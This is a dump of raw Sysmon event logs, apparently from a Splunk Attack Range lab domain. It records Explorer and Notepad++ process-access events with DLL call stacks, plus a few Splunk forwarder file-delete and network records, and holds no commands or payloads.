Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001047388Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.018{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047387Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.018{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047386Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.018{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047385Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.018{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001047384Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.002{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\COMDLG32.dll+1e967|C:\Windows\System32\SHLWAPI.dll+9fc1|C:\Windows\System32\SHLWAPI.dll+9edd|C:\Windows\System32\SHLWAPI.dll+9d96|C:\Windows\System32\SHLWAPI.dll+9c0d|C:\Windows\System32\SHELL32.dll+13ea57|C:\Windows\System32\SHELL32.dll+13ded8|C:\Windows\System32\SHELL32.dll+13dadb|C:\Windows\System32\SHELL32.dll+13dc47|C:\Windows\System32\SHELL32.dll+13dbca|C:\Windows\System32\COMDLG32.dll+10e08 10341000x80000000000000001047383Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.002{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\COMDLG32.dll+1e967|C:\Windows\System32\SHLWAPI.dll+9fc1|C:\Windows\System32\SHLWAPI.dll+9edd|C:\Windows\System32\SHLWAPI.dll+9d96|C:\Windows\System32\SHLWAPI.dll+9c0d|C:\Windows\System32\SHELL32.dll+13ea57|C:\Windows\System32\SHELL32.dll+13ded8|C:\Windows\System32\SHELL32.dll+13dadb|C:\Windows\System32\SHELL32.dll+13dc47|C:\Windows\System32\SHELL32.dll+13dbca|C:\Windows\System32\COMDLG32.dll+10e08 10341000x80000000000000001047382Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:28.987{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\COMDLG32.dll+1e967|C:\Windows\System32\SHLWAPI.dll+9fc1|C:\Windows\System32\SHLWAPI.dll+9edd|C:\Windows\System32\SHLWAPI.dll+9d96|C:\Windows\System32\SHLWAPI.dll+9c0d|C:\Windows\System32\SHELL32.dll+13ea57|C:\Windows\System32\SHELL32.dll+13ded8 23542300x8000000000000000806922Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:30.785{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A3657062EEA4E26902E97A91BBD8157,SHA256=E42BEC63B20611C9A35D85B47CC25FA7113FCD0B0489EA6A1FCF51CB171C3C1D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047439Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:22.706{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50969-false10.0.1.12-8000- 
23542300x80000000000000001047438Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:30.003{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C79775C4137A6D67CC4D6AD7F805A3F,SHA256=2DBC077B66BC398B1B9FA56409267CB4746A78DA630C21A8C4214384DE0C0ED8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806921Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:30.067{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=7BEFDD221976BC965723D29A6DD63659,SHA256=2083DBC8D42935B5E5049AC624CF6AE8C5E03B168F008074DC0FF0769E0BA860,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806923Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:31.785{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45230BB7864DB6644D0E4DCF4295DB32,SHA256=E0A983FDE9A783F25B58F0DAE0FE6C5787E73E3F8033A8B178D6AE63B774A6B3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047510Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.939{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047509Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.939{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047508Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.939{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047507Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.939{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047506Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.939{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047505Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.939{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047504Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.939{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047503Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.939{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047502Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.939{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047501Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.939{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047500Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.939{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047499Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.939{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047498Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.939{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047497Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 